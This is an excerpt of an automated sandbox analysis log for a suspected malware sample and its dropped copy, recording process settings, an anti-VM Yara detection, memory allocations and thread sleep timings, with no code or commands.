Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR

Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: AF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: 2800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: 4800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: 7860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: 8860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: 8A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: 9A20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: A060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: B060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: C060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: 3010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: C30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 29F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 2860000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 7780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 8780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 8930000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 9930000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 9C80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: AC80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 30A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 3200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Memory allocated: 5200000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 598007	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597786	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597560	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597334	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597212	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 597045	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596717	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 594865	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 594180	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 594061	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593844	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593734	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593625	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Thread delayed: delay time: 593502	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599560
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599432
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598387
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598266
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 598047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597594
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595953
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595844
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595515
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595294
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595174
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 595058
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594937
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594828
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594281
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594172
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Thread delayed: delay time: 594062

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7468	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6589	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Window / User API: threadDelayed 7175	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe	Window / User API: threadDelayed 2655	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Window / User API: threadDelayed 2161
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe	Window / User API: threadDelayed 7694

Source: C:\Users\user\Desktop\3140, EUR.exe TID: 6912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7116	Thread sleep count: 7468 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3300	Thread sleep count: 177 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6264	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7448	Thread sleep count: 7175 > 30	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7448	Thread sleep count: 2655 > 30	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -598007s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -597786s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -597560s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -597334s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -597212s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -597045s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -596717s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -596500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -596141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -595266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -594865s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -594180s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -594061s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -593953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -593844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -593734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -593625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\3140, EUR.exe TID: 7444	Thread sleep time: -593502s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7316	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe TID: 7736	Thread sleep time: -600000s >= -30000s
